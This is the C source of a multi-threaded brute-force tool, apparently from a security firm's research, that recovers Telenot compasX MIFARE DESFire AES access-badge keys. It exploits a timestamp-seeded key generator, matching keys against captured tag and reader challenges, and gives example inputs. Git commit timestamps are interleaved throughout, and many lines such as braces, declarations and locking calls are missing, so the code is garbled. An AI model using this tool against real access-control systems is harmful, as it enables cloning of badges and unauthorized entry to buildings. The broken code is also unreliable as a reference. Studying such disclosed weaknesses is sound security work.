2022-01-27 02:57:10 +08:00
// Multi threaded bruteforce tool
// for transponder AES keys generated by Telenot's compasX software
// Copyright (C) 2022 X41 D-Sec GmbH, Markus Vervier, Yaşar Klawohn
// Copyright (C) 2022 Iceman
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <https://www.gnu.org/licenses/>.
2022-01-31 17:08:17 +08:00
#if !defined(_WIN32) && !defined(__APPLE__)
2022-02-05 19:32:50 +08:00
#define _POSIX_C_SOURCE 200112L // need localtime_r()
2022-01-27 13:10:20 +08:00
2022-01-27 02:57:10 +08:00
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include <limits.h>
#include <openssl/evp.h>
#include <openssl/err.h>
#include <string.h>
#include <time.h>
#include <pthread.h>
#include <unistd.h>
2023-06-23 04:34:49 +08:00
#include <inttypes.h>
2022-01-27 02:57:10 +08:00
#include "util_posix.h"
#define AEND "\x1b[0m"
#define _RED_(s) "\x1b[31m" s AEND
#define _GREEN_(s) "\x1b[32m" s AEND
#define _YELLOW_(s) "\x1b[33m" s AEND
#define _CYAN_(s) "\x1b[36m" s AEND
// a global mutex to prevent interlaced printing from different threads
pthread_mutex_t print_lock;
static int global_found = 0;
static int thread_count = 2;
typedef struct thread_args {
int thread;
int idx;
uint64_t starttime;
uint64_t stoptime;
uint8_t tag[16];
2022-02-05 19:32:50 +08:00
uint8_t rdr[32];
2022-01-27 02:57:10 +08:00
} targs;
static void make_key(uint32_t seed, uint8_t key[]) {
uint32_t lseed = seed;
lseed = (lseed * 22695477) % UINT_MAX;
lseed = (lseed + 1) % UINT_MAX;
for (int i = 0; i < 16; i++) {
lseed = (lseed * 22695477) % UINT_MAX;
lseed = (lseed + 1) % UINT_MAX;
key[i] = ((lseed >> 16) & 0x7fff) % 0xFF;
static void handleErrors(void) {
// source https://wiki.openssl.org/index.php/EVP_Symmetric_Encryption_and_Decryption#Decrypting_the_Message
static int decrypt_aes(uint8_t ciphertext[], int ciphertext_len, uint8_t key[], uint8_t iv[], uint8_t plaintext[]) {
if (!(ctx = EVP_CIPHER_CTX_new()))
if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv))
EVP_CIPHER_CTX_set_padding(ctx, 0);
int len = 0;
if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len))
int plaintext_len = len;
if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len))
plaintext_len += len;
return plaintext_len;
static int hexstr_to_byte_array(char hexstr[], uint8_t bytes[], size_t byte_len) {
size_t hexstr_len = strlen(hexstr);
if (hexstr_len % 16) {
return 1;
if (byte_len < (hexstr_len / 2)) {
return 2;
char *pos = &hexstr[0];
for (size_t count = 0; *pos != 0; count++) {
sscanf(pos, "%2hhx", &bytes[count]);
pos += 2;
return 0;
static void print_hex(const uint8_t *data, const size_t len) {
if (data == NULL || len == 0) return;
for (size_t i = 0; i < len; i++) {
printf("%02X", data[i]);
static void print_time(uint64_t at) {
time_t t = at;
struct tm lt;
2022-01-27 13:10:20 +08:00
#if defined(_WIN32)
2022-02-05 19:32:50 +08:00
(void)localtime_s(<, &t);
2022-01-27 13:10:20 +08:00
2022-02-05 19:32:50 +08:00
(void)localtime_r(&t, <);
2022-01-27 13:10:20 +08:00
2022-01-27 02:57:10 +08:00
2023-02-24 03:58:45 +08:00
char res[70];
2023-02-25 03:57:42 +08:00
#if defined(__MINGW32__) || defined(__MINGW64__)
strftime(res, sizeof(res), "('%Y-%m-%d %H:%M:%S')", <);
2023-02-24 03:58:45 +08:00
strftime(res, sizeof(res), "%s ('%Y-%m-%d %H:%M:%S')", <);
2023-03-05 03:10:46 +08:00
2023-02-24 03:58:45 +08:00
printf("%s\n", res);
2022-01-27 02:57:10 +08:00
static void *brute_thread(void *arguments) {
struct thread_args *args = (struct thread_args *) arguments;
uint64_t starttime = args->starttime;
2022-02-05 19:32:50 +08:00
uint64_t stoptime = args->stoptime;
2022-01-27 02:57:10 +08:00
uint8_t local_tag[16];
2022-02-05 19:32:50 +08:00
uint8_t local_rdr[32];
2022-01-27 02:57:10 +08:00
memcpy(local_tag, args->tag, 16);
memcpy(local_rdr, args->rdr, 32);
for (uint64_t i = starttime + args->idx; i < stoptime; i += thread_count) {
if (__atomic_load_n(&global_found, __ATOMIC_ACQUIRE) == 1) {
uint8_t key[16] = {0x00};
make_key(i, key);
uint8_t iv[16] = {0x00};
uint8_t dec_tag[16] = {0x00};
decrypt_aes(local_tag, 16, key, iv, dec_tag);
uint8_t dec_rdr[32] = {0x00};
decrypt_aes(local_rdr, 32, key, local_tag, dec_rdr);
// check rol byte first
if (dec_tag[0] != dec_rdr[31]) continue;
// compare rest
if (dec_tag[1] != dec_rdr[16]) continue;
if (dec_tag[2] != dec_rdr[17]) continue;
if (dec_tag[3] != dec_rdr[18]) continue;
if (dec_tag[4] != dec_rdr[19]) continue;
if (dec_tag[5] != dec_rdr[20]) continue;
if (dec_tag[6] != dec_rdr[21]) continue;
if (dec_tag[7] != dec_rdr[22]) continue;
if (dec_tag[8] != dec_rdr[23]) continue;
if (dec_tag[9] != dec_rdr[24]) continue;
if (dec_tag[10] != dec_rdr[25]) continue;
if (dec_tag[11] != dec_rdr[26]) continue;
if (dec_tag[12] != dec_rdr[27]) continue;
if (dec_tag[13] != dec_rdr[28]) continue;
if (dec_tag[14] != dec_rdr[29]) continue;
if (dec_tag[15] != dec_rdr[30]) continue;
__sync_fetch_and_add(&global_found, 1);
// lock this section to avoid interlacing prints from different threats
printf("Found timestamp........ ");
printf("key.................... \x1b[32m");
print_hex(key, sizeof(key));
return NULL;
2022-02-05 19:32:50 +08:00
static int usage(const char *s) {
2022-01-27 02:57:10 +08:00
printf(_YELLOW_("syntax:") "\n");
printf(" %s <unix timestamp> <16 byte tag challenge> <32 byte reader response challenge>\n", s);
printf(_YELLOW_("example:") "\n");
printf(" ./mfd_aes_brute 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c\n");
return 1;
2022-02-05 19:32:50 +08:00
int main(int argc, char *argv[]) {
2022-01-27 02:57:10 +08:00
printf(_CYAN_("Telenot access MIFARE DESFire AES key recovery tool") "\n");
printf("multi-threaded edition\n");
if (argc != 4) return usage(argv[0]);
2023-02-21 11:40:48 +08:00
uint64_t start_time = 0;
2023-02-21 23:20:34 +08:00
sscanf(argv[1], "%"PRIu64, &start_time);
2022-01-27 02:57:10 +08:00
uint8_t tag_challenge[16] = {0x00};
if (hexstr_to_byte_array(argv[2], tag_challenge, sizeof(tag_challenge)))
return 2;
uint8_t rdr_resp_challenge[32] = {0x00};
if (hexstr_to_byte_array(argv[3], rdr_resp_challenge, sizeof(rdr_resp_challenge)))
return 3;
printf("Starting timestamp..... ");
printf("Tag Challenge.......... ");
print_hex(tag_challenge, sizeof(tag_challenge));
printf("Rdr Resp & Challenge... ");
print_hex(rdr_resp_challenge, sizeof(rdr_resp_challenge));
2022-02-05 19:32:50 +08:00
2022-01-27 02:57:10 +08:00
uint64_t t1 = msclock();
#if !defined(_WIN32) || !defined(__WIN32__)
thread_count = sysconf(_SC_NPROCESSORS_CONF);
if (thread_count < 2)
thread_count = 2;
#endif /* _WIN32 */
printf("\nBruteforce using " _YELLOW_("%d") " threads\n", thread_count);
pthread_t threads[thread_count];
// create a mutex to avoid interlacing print commands from our different threads
pthread_mutex_init(&print_lock, NULL);
// threads
2022-02-05 19:32:50 +08:00
uint64_t stop_time = time(NULL);
2022-01-27 02:57:10 +08:00
for (int i = 0; i < thread_count; ++i) {
struct thread_args *a = calloc(1, sizeof(struct thread_args));
a->thread = i;
a->idx = i;
a->starttime = start_time;
a->stoptime = stop_time;
memcpy(a->tag, tag_challenge, 16);
memcpy(a->rdr, rdr_resp_challenge, 32);
pthread_create(&threads[i], NULL, brute_thread, (void *)a);
// wait for threads to terminate:
for (int i = 0; i < thread_count; ++i) {
pthread_join(threads[i], NULL);
if (global_found == false) {
printf("\n" _RED_("!!!") " failed to find a key\n\n");
t1 = msclock() - t1;
if (t1 > 0) {
printf("execution time " _YELLOW_("%.2f") " sec\n", (float)t1 / 1000.0);
// clean up mutex
return 0;